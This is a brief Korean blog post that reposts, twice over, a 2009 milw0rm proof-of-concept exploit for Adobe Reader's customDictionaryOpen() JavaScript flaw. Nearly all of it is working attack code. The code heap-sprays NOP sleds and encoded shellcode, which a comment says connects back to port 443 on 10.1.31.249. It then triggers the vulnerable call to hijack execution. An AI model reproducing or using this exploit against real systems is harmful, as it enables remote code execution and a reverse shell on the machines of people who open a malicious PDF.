반응형
GetAnnots() 취약점과 같이 발표 된 customDictionaryOpen()의 POC
//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//##############
var memory;
function New_Script()
{
var nop = unescape("%u9090%u9090");
var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b
%u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%ufeb1%u199f%ua442%u88da%ucd2e%ucac4
%uc30b%uf896%u15a9%u21a3%uf619%u904c%u680b%u2345%u8a20%u02ea%ucd20%u13ea%ucb21%u924c%uf61a
%u904c%uaef8%uf108%ua548");//443 on 10.1.31.249
while(nop.length <= 0x10000/2) nop+=nop;
nop=nop.substring(0,0x10000/2 - shellcode.length);
memory=new Array();
for(i=0;i<0x6ff0;i++)
{memory[i]=nop + shellcode;}
//start exploit now
start();
function start()
{
this.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141 ;)
}
}
//############################
# milw0rm.com [2009-04-29]
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//##############
var memory;
function New_Script()
{
var nop = unescape("%u9090%u9090");
var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b
%u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%ufeb1%u199f%ua442%u88da%ucd2e%ucac4
%uc30b%uf896%u15a9%u21a3%uf619%u904c%u680b%u2345%u8a20%u02ea%ucd20%u13ea%ucb21%u924c%uf61a
%u904c%uaef8%uf108%ua548");//443 on 10.1.31.249
while(nop.length <= 0x10000/2) nop+=nop;
nop=nop.substring(0,0x10000/2 - shellcode.length);
memory=new Array();
for(i=0;i<0x6ff0;i++)
{memory[i]=nop + shellcode;}
//start exploit now
start();
function start()
{
this.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141 ;)
}
}
//############################
# milw0rm.com [2009-04-29]
댓글